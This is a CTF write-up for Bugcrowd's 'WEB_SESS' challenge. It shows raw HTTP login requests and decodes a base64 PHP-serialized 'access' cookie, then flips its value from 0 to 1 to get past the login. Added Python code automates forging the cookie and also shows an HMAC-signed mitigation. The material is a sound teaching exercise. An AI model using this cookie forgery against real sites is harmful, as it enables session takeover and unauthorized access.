- BUGCROWD CTF WRITEUP
- Challenge: WEB_SESS
- Description: Nothing...
- Point Reward: 5
- Difficulty: Easy
- Alright, so we've got another login form, but no description. That seems strange, so let's just try logging in with some random credentials and inspect the request and response in Burp.
- Request:
- ---------------------------------
- POST /challenge_2.php HTTP/1.1
- Host: april16.bugcrowdctf.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Referer: https://april16.bugcrowdctf.com/challenge_2.php
- Cookie: PHPSESSID=p685nulc6jrp6he6tbitois8e7; access=YToxOntzOjY6ImFjY2VzcyI7aTowO30%3D
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 31
- username=&password=JSp%40sSw0rd
- ---------------------------------
- As you can see, this is our POST request for logging into the site, but notice the cookie called access: its value looks like base64 (the trailing %3D is a URL-encoded =). Let's decode it and see what we have.
- Base64 decoded Cookie: a:1:{s:6:"access";i:0;}
- This is PHP serialized data: an array (a) with one element, whose key is the 6-character string (s) "access" and whose value is the integer (i) 0.
- Notice the i:0. Let's see what happens if we change it to i:1 and base64-encode the result again.
- Base64 modified Cookie: YToxOntzOjY6ImFjY2VzcyI7aToxO30%3D
- Let's replace the cookie in the request with the modified one and see whether we're logged in.
- Modified Request:
- ---------------------------------
- POST /challenge_2.php HTTP/1.1
- Host: april16.bugcrowdctf.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Referer: https://april16.bugcrowdctf.com/challenge_2.php
- Cookie: PHPSESSID=p685nulc6jrp6he6tbitois8e7; access=YToxOntzOjY6ImFjY2VzcyI7aToxO30%3D
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 31
- username=&password=JSp%40sSw0rd
- ---------------------------------
- After replacing the cookie with the modified one and forwarding the request, we get the following response:
- "Nice work! Cookie manipulation can often result in an attacker taking over a user's session.
- Read more on OWASP's Periodic Table of Vulnerabilities."
- Challenge Solved! :)
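The decode, modify and re-encode steps above, automated as an added example (this is not code from the original writeup or from the challenge): a minimal parser and serializer for the subset of PHP's serialize() format seen in the cookie, a helper that forges the access cookie, and, as the fix the challenge's response hints at, an HMAC-signed variant of the same cookie that rejects tampering. The signing key, the `.`-separated signed format and all function names are assumptions for illustration; the challenge's own server-side code is not shown on the page.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote

# --- Minimal PHP serialize()/unserialize() for the types in the cookie ---
# Supported: i:<int>;  b:<0|1>;  s:<len>:"<bytes>";  a:<n>:{<key><value>...}


def _parse(d: bytes, pos: int):
    """Parse one value starting at d[pos]; return (value, position after it)."""
    t = chr(d[pos])
    if t == "i":
        end = d.index(b";", pos)
        return int(d[pos + 2:end]), end + 1
    if t == "b":
        end = d.index(b";", pos)
        return d[pos + 2:end] == b"1", end + 1
    if t == "s":
        colon = d.index(b":", pos + 2)
        length = int(d[pos + 2:colon])          # byte length declared by PHP
        start = colon + 2                       # skip ':"'
        if d[colon + 1:colon + 2] != b'"' or d[start + length:start + length + 2] != b'";':
            raise ValueError("malformed string at %d" % pos)
        return d[start:start + length].decode("utf-8"), start + length + 2
    if t == "a":
        colon = d.index(b":", pos + 2)
        count = int(d[pos + 2:colon])
        if d[colon + 1:colon + 2] != b"{":
            raise ValueError("malformed array at %d" % pos)
        pos = colon + 2
        result = {}
        for _ in range(count):
            key, pos = _parse(d, pos)
            value, pos = _parse(d, pos)
            result[key] = value
        if d[pos:pos + 1] != b"}":
            raise ValueError("unterminated array")
        return result, pos + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))


def php_unserialize(data: bytes):
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value


def php_serialize(value) -> bytes:
    if isinstance(value, bool):            # bool before int: bool is an int subclass
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type %s" % type(value).__name__)


# --- The attack: what the writeup does by hand in Burp ---

def decode_access_cookie(cookie_value: str):
    """URL-decode, base64-decode and unserialize the 'access' cookie value."""
    return php_unserialize(base64.b64decode(unquote(cookie_value)))


def forge_access_cookie(cookie_value: str, access: int) -> str:
    """Return a URL-encoded cookie value identical to the original except for 'access'."""
    data = decode_access_cookie(cookie_value)
    data["access"] = access
    return quote(base64.b64encode(php_serialize(data)).decode("ascii"), safe="")


# --- The fix: sign client-side state so tampering is detectable (assumed design, not the challenge's) ---

def sign_cookie(data: dict, key: bytes) -> str:
    payload = base64.b64encode(php_serialize(data))
    mac = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode("ascii") + "." + mac


def verify_cookie(cookie_value: str, key: bytes):
    """Return the cookie's data if its MAC is valid, else None (reject before unserializing)."""
    payload, _, mac = cookie_value.rpartition(".")
    expected = hmac.new(key, payload.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode("ascii", "replace"), expected.encode("ascii")):
        return None
    return php_unserialize(base64.b64decode(payload))


if __name__ == "__main__":
    original = "YToxOntzOjY6ImFjY2VzcyI7aTowO30%3D"   # the access cookie from the request above
    print(decode_access_cookie(original))             # {'access': 0}
    print(forge_access_cookie(original, 1))           # YToxOntzOjY6ImFjY2VzcyI7aToxO30%3D
```

Running the block reproduces the writeup's modified cookie exactly. The signed variant only shows the minimal mitigation when state must live in the cookie; the better fix is to keep the access flag server-side, keyed by PHPSESSID, so the client never holds it. Note also that verify_cookie checks the MAC before calling unserialize, because feeding untrusted input to PHP's real unserialize() is itself dangerous.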